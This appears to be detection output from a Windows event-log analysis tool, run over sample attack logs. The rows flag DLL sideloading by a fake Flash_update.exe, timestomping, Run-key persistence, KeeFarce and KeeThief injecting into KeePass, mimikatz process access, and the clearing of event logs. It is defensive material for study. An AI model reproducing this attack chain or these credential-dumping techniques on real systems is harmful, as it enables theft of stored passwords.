+2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
+2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,../hayabusa-rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
